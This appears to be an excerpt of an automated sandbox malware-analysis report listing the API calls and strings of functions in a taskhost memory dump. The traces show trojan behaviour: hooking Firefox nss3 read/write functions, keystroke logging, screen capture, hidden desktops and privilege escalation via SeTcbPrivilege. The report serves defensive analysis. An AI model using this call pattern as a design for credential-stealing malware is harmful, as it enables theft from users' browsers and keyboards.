Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

EnterCriticalSection.KERNEL32(011B3FE4), ref: 011AC0BC
LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC11A

Part of subcall function 011A1049: EnterCriticalSection.KERNEL32(hL?), ref: 011A1064
Part of subcall function 011A1049: LeaveCriticalSection.KERNEL32(hL?), ref: 011A10E7
Part of subcall function 011A1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 011A11B2
Part of subcall function 011A1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 011A13EC

LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC161

Part of subcall function 011A835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 011A83B8

Part of subcall function 011A82E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 011A831F

LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC2CC
EnterCriticalSection.KERNEL32(011B3FE4), ref: 011AC2EB
LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC34D

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC376
EnterCriticalSection.KERNEL32(011B3FE4), ref: 011AC395
LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC3DD

Strings

If-Modified-Since, xrefs: 011AC20F
identity, xrefs: 011AC1DF
Accept-Encoding, xrefs: 011AC1EB

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 0119DF87
CloseHandle.KERNEL32(00000000), ref: 0119DF97
TlsFree.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFA2
CloseHandle.KERNEL32(00000000), ref: 0119DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFBA
CloseHandle.KERNEL32(00000000), ref: 0119DFC7
SelectObject.GDI32(00000000,00000000), ref: 0119DFE1
DeleteObject.GDI32(00000000), ref: 0119DFF2
DeleteDC.GDI32(00000000), ref: 0119DFFF
CloseHandle.KERNEL32(00000000), ref: 0119E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0119E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0119E038

Part of subcall function 011A4DCA: CloseHandle.KERNEL32(00000000), ref: 011A4DD9
Part of subcall function 011A4DCA: CloseHandle.KERNEL32(00000000), ref: 011A4DE2

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 011A4CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 011A4D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 011A4D19
CreateProcessAsUserW.ADVAPI32(?,00000000,011AC8F5,00000000,00000000,00000000,011AC8F5,011AC8F5,00000000,?,?,?,00000000,00000044), ref: 011A4D8A
CloseHandle.KERNEL32(?), ref: 011A4D9D
CloseHandle.KERNEL32(?), ref: 011A4DA2
FreeLibrary.KERNEL32(?), ref: 011A4DB9

Strings

userenv.dll, xrefs: 011A4CE6
DestroyEnvironmentBlock, xrefs: 011A4D0F
CreateEnvironmentBlock, xrefs: 011A4D07

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,011A20A9), ref: 0119C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,011A20A9), ref: 0119C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0119C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0119C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0119C14C

Part of subcall function 0119BE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0119C160,011B2360), ref: 0119BE72

Part of subcall function 011AB58C: InitializeCriticalSection.KERNEL32(011B3FE4,76C61857,0119C185,011B2360), ref: 011AB5A2
Part of subcall function 011AB58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 011AB5DE
Part of subcall function 011AB58C: GetProcAddress.KERNEL32(PR_SetError), ref: 011AB5F0
Part of subcall function 011AB58C: GetProcAddress.KERNEL32(PR_GetError), ref: 011AB602

Strings

PR_Read, xrefs: 0119C134
PR_Write, xrefs: 0119C141
PR_Close, xrefs: 0119C127
PR_OpenTCPSocket, xrefs: 0119C11F
nss3.dll, xrefs: 0119C10C

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 0119DCA2: GetClassNameW.USER32(012401CA,?,00000101), ref: 0119DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 01195CB4
ResetEvent.KERNEL32(00000010), ref: 01195D03
PostMessageW.USER32(?,?,?,00000010), ref: 01195D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 01195D35

Part of subcall function 01195B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 01195B40
Part of subcall function 01195B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 01195B9A
Part of subcall function 01195B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 01195BD6
Part of subcall function 01195B28: TerminateProcess.KERNEL32(?,00000000), ref: 01195BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 01195D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 01195D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 01195D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 01195DA7

Part of subcall function 011A4DCA: CloseHandle.KERNEL32(00000000), ref: 011A4DD9
Part of subcall function 011A4DCA: CloseHandle.KERNEL32(00000000), ref: 011A4DE2

IntersectRect.USER32(?,?), ref: 01195DC7
FillRect.USER32(?,?,00000006), ref: 01195DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 01195DED

Part of subcall function 011A7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 011A7AB5

Part of subcall function 011A6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,011A2E87,?,19367401,?,00000001,8889347B,00000002), ref: 011A6BA9
Part of subcall function 011A6B9E: CloseHandle.KERNEL32(00000000), ref: 011A6BB4

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 011A7AF0: WindowFromPoint.USER32(?,?), ref: 011A7B0C
Part of subcall function 011A7AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 011A7B3D
Part of subcall function 011A7AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 011A7B61
Part of subcall function 011A7AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 011A7B72
Part of subcall function 011A7AF0: GetWindowLongW.USER32(?,000000F0), ref: 011A7B8F
Part of subcall function 011A7AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 011A7B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 0119B6B6
GetParent.USER32(00000000), ref: 0119B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 0119B6FD
IsWindow.USER32(?), ref: 0119B720

Part of subcall function 0119B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0119B0B3
Part of subcall function 0119B0AD: ReleaseMutex.KERNEL32(?), ref: 0119B0E7
Part of subcall function 0119B0AD: IsWindow.USER32(?), ref: 0119B0EE
Part of subcall function 0119B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0119B108
Part of subcall function 0119B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0119B110

GetWindowInfo.USER32(00000000,?), ref: 0119B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0119B8AD

Part of subcall function 0119B31C: GetAncestor.USER32(?,00000002), ref: 0119B345
Part of subcall function 0119B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0119B370
Part of subcall function 0119B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 0119B3B2
Part of subcall function 0119B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0119B448
Part of subcall function 0119B31C: PostMessageW.USER32(?,00000112,?,?), ref: 0119B49B
Part of subcall function 0119B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0119B4DA

Part of subcall function 0119DCA2: GetClassNameW.USER32(012401CA,?,00000101), ref: 0119DCBD

Part of subcall function 0119B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0119B130
Part of subcall function 0119B11C: ReleaseMutex.KERNEL32(?), ref: 0119B14F
Part of subcall function 0119B11C: GetWindowRect.USER32(?,?), ref: 0119B15C
Part of subcall function 0119B11C: IsRectEmpty.USER32(?), ref: 0119B1E0
Part of subcall function 0119B11C: GetWindowLongW.USER32(?,000000F0), ref: 0119B1EF
Part of subcall function 0119B11C: GetParent.USER32(?), ref: 0119B205
Part of subcall function 0119B11C: MapWindowPoints.USER32(00000000,00000000), ref: 0119B20E
Part of subcall function 0119B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0119B232

Strings

<, xrefs: 0119B769
, xrefs: 0119B654
@, xrefs: 0119B806

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AD865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 011AD88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 011AD89D
GetProcessWindowStation.USER32 ref: 011AD8AE

Part of subcall function 011AD83D: GetProcessWindowStation.USER32 ref: 011AD841
Part of subcall function 011AD83D: SetProcessWindowStation.USER32(00000000), ref: 011AD855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 011AD8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 011AD8FD
GetCurrentThreadId.KERNEL32(?,?,?,0119731A,?,2937498D,?,00000000), ref: 011AD909
GetThreadDesktop.USER32(00000000), ref: 011AD910

Part of subcall function 011AD7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,011AD84D,00000000,?,?,?,0119731A,?,2937498D,?), ref: 011AD81D

SetThreadDesktop.USER32(00000000), ref: 011AD922
CloseDesktop.USER32(00000000), ref: 011AD934
CloseWindowStation.USER32(?), ref: 011AD94F

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AC912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 011AC929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,011AD2A8), ref: 011AC955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?), ref: 011AC96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?), ref: 011AC984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?,00000000), ref: 011ACA0D

Part of subcall function 011A4A87: GetCurrentThread.KERNEL32(00000020,00000000,011AC9A1,00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A97
Part of subcall function 011A4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A9E
Part of subcall function 011A4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,011AC9A1,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4AB0
Part of subcall function 011A4A87: LookupPrivilegeValueW.ADVAPI32(00000000,011AC9A1,?), ref: 011A4AD4
Part of subcall function 011A4A87: AdjustTokenPrivileges.KERNELBASE(011AC9A1,00000000,00000001,00000000,00000000,00000000), ref: 011A4AE9
Part of subcall function 011A4A87: GetLastError.KERNEL32 ref: 011A4AF3
Part of subcall function 011A4A87: CloseHandle.KERNEL32(011AC9A1), ref: 011A4B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?,00000000), ref: 011AC9A1

Part of subcall function 011AC8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,011AC9FB,00000000,?,?,?), ref: 011AC8C6
Part of subcall function 011AC8A1: CloseHandle.KERNEL32(?), ref: 011AC907

Strings

SeTcbPrivilege, xrefs: 011AC997
.exe, xrefs: 011AC93B

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011ABD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

EnterCriticalSection.KERNEL32(011B3FE4), ref: 011ABDB7
LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011ABDE5
EnterCriticalSection.KERNEL32(011B3FE4), ref: 011ABE09

Part of subcall function 011A14C3: InternetCrackUrlA.WININET ref: 011A17AC
Part of subcall function 011A14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 011A17CA
Part of subcall function 011A14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 011A18E4
Part of subcall function 011A14C3: EnterCriticalSection.KERNEL32(hL?), ref: 011A1910
Part of subcall function 011A14C3: LeaveCriticalSection.KERNEL32(hL?,?,?), ref: 011A194D

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

Part of subcall function 011A835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 011A83B8

Part of subcall function 011A40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 011A410D

Part of subcall function 011A3346: HeapAlloc.KERNEL32(00000008,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?,?), ref: 011A3368
Part of subcall function 011A3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?), ref: 011A3379

LeaveCriticalSection.KERNEL32(011B3FE4,00000000,?,00000000), ref: 011AC04C

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC06B
LeaveCriticalSection.KERNEL32(011B3FE4), ref: 011AC078

Strings

0, xrefs: 011ABF31
%x, xrefs: 011ABF11
Content-Length, xrefs: 011ABF55

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A14C3, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367

APIs

Part of subcall function 011A433F: CharLowerA.USER32(00000000), ref: 011A4420
Part of subcall function 011A433F: CharLowerA.USER32(?), ref: 011A442D

Part of subcall function 011A3346: HeapAlloc.KERNEL32(00000008,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?,?), ref: 011A3368
Part of subcall function 011A3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?), ref: 011A3379

Part of subcall function 011A7FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 011A8104

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

InternetCrackUrlA.WININET ref: 011A17AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 011A17CA

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

LeaveCriticalSection.KERNEL32(hL?,?,?), ref: 011A194D

Part of subcall function 011A4660: CryptAcquireContextW.ADVAPI32(011A8C87,00000000,00000000,00000001,F0000040,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A4679
Part of subcall function 011A4660: CryptCreateHash.ADVAPI32(011A8C87,00008003,00000000,00000000,00000030,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A4691
Part of subcall function 011A4660: CryptHashData.ADVAPI32(00000030,00000010,011A8C87,00000000,?,011A8C87), ref: 011A46AD
Part of subcall function 011A4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,011A8C87), ref: 011A46C5
Part of subcall function 011A4660: CryptDestroyHash.ADVAPI32(00000030,?,011A8C87), ref: 011A46DC
Part of subcall function 011A4660: CryptReleaseContext.ADVAPI32(011A8C87,00000000,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A46E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 011A18E4

Part of subcall function 011A763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,011A9EAB,?,?,00000004), ref: 011A7658
Part of subcall function 011A763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,011A9EAB,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7672
Part of subcall function 011A763A: RegCloseKey.KERNEL32(00000004,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7681

EnterCriticalSection.KERNEL32(hL?), ref: 011A1910

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

?*, xrefs: 011A14FD
hL?, xrefs: 011A190A, 011A190F, 011A1947

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AAEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 011AB053

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

EnterCriticalSection.KERNEL32(011B3FB4), ref: 011AAF36
LeaveCriticalSection.KERNEL32(011B3FB4), ref: 011AAFD9

Part of subcall function 0119EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0119EA43
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0119EA54
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0119EA61
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0119EA6E
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0119EA7B
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0119EA88
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0119EA95
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0119EAA2
Part of subcall function 0119EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 0119EAEA
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0119EAF5
Part of subcall function 0119EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0119EB07
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0119EB12
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0119EB1E
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0119EB2B
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0119EB38
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0119EB45
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0119EB52
Part of subcall function 0119EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0119EB5F
Part of subcall function 0119EA11: FreeLibrary.KERNEL32(00000000), ref: 0119EE9C
Part of subcall function 0119EA11: FreeLibrary.KERNEL32(?), ref: 0119EEA6
Part of subcall function 0119EA11: FreeLibrary.KERNEL32(00000000), ref: 0119EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 011AAF9B

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

GetKeyboardState.USER32(?), ref: 011AAFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 011AB01B

Part of subcall function 011AAD5F: EnterCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAD7C
Part of subcall function 011AAD5F: LeaveCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAD9D
Part of subcall function 011AAD5F: EnterCriticalSection.KERNEL32(011B3FB4,?,?,?,?,011AB052,?), ref: 011AADAE
Part of subcall function 011AAD5F: LeaveCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAE47

Strings

, xrefs: 011AB039

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AB58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(011B3FE4,76C61857,0119C185,011B2360), ref: 011AB5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 011AB5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 011AB5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 011AB602

Strings

PR_SetError, xrefs: 011AB5E0
PR_GetError, xrefs: 011AB5F2
PR_GetNameForIdentity, xrefs: 011AB5BE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01197206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 011A6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 011A6463
Part of subcall function 011A6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,01197518,?), ref: 011A64B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 011972EB
SetThreadPriority.KERNEL32(00000000), ref: 011972F2

Part of subcall function 011AD865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 011AD88A
Part of subcall function 011AD865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 011AD89D
Part of subcall function 011AD865: GetProcessWindowStation.USER32 ref: 011AD8AE
Part of subcall function 011AD865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 011AD8E9
Part of subcall function 011AD865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 011AD8FD
Part of subcall function 011AD865: GetCurrentThreadId.KERNEL32(?,?,?,0119731A,?,2937498D,?,00000000), ref: 011AD909
Part of subcall function 011AD865: GetThreadDesktop.USER32(00000000), ref: 011AD910
Part of subcall function 011AD865: SetThreadDesktop.USER32(00000000), ref: 011AD922
Part of subcall function 011AD865: CloseDesktop.USER32(00000000), ref: 011AD934
Part of subcall function 011AD865: CloseWindowStation.USER32(?), ref: 011AD94F

Part of subcall function 0119DD09: TlsAlloc.KERNEL32(011B2868,00000000,0000018C,00000000,00000000), ref: 0119DD22
Part of subcall function 0119DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0119DD4A
Part of subcall function 0119DD09: CreateEventW.KERNEL32(011B2C30,00000001,00000000,?,84889912,?,00000001), ref: 0119DD74
Part of subcall function 0119DD09: CreateMutexW.KERNEL32(011B2C30,00000000,?,18782822,?,00000001), ref: 0119DD97
Part of subcall function 0119DD09: CreateFileMappingW.KERNEL32(00000000,011B2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0119DDC2
Part of subcall function 0119DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0119DDD8
Part of subcall function 0119DD09: GetDC.USER32(00000000), ref: 0119DDF5
Part of subcall function 0119DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0119DE15
Part of subcall function 0119DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0119DE1F
Part of subcall function 0119DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0119DE32
Part of subcall function 0119DD09: ReleaseDC.USER32(00000000,?), ref: 0119DE56
Part of subcall function 0119DD09: CreateMutexW.KERNEL32(011B2C30,00000000,?,1898B122,?,00000001,011B28B8,?,00000102,011B28A4,011B2E70,00000010,?,?), ref: 0119DF00
Part of subcall function 0119DD09: GetDC.USER32(00000000), ref: 0119DF15
Part of subcall function 0119DD09: CreateCompatibleDC.GDI32(00000000), ref: 0119DF23
Part of subcall function 0119DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0119DF3A
Part of subcall function 0119DD09: SelectObject.GDI32(00000000,00000000), ref: 0119DF4D
Part of subcall function 0119DD09: ReleaseDC.USER32(00000000,00000001), ref: 0119DF65

GetShellWindow.USER32 ref: 01197338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0119736B

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 011973CD
CloseHandle.KERNEL32(?), ref: 011973DD
CloseHandle.KERNEL32(?), ref: 011973E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 011973F2

Part of subcall function 0119D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0119E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0119D714
Part of subcall function 0119D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0119D72F
Part of subcall function 0119D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0119D7C1
Part of subcall function 0119D4B4: GetSystemMetrics.USER32(00000017), ref: 0119D8DB
Part of subcall function 0119D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0119DC67

Part of subcall function 0119DF74: DeleteObject.GDI32(00000000), ref: 0119DF87
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DF97
Part of subcall function 0119DF74: TlsFree.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFA2
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DFB0
Part of subcall function 0119DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFBA
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DFC7
Part of subcall function 0119DF74: SelectObject.GDI32(00000000,00000000), ref: 0119DFE1
Part of subcall function 0119DF74: DeleteObject.GDI32(00000000), ref: 0119DFF2
Part of subcall function 0119DF74: DeleteDC.GDI32(00000000), ref: 0119DFFF
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119E010
Part of subcall function 0119DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0119E01F
Part of subcall function 0119DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0119E038

Part of subcall function 011A65B7: recv.WS2_32(?,?,00000400,00000000), ref: 011A6600
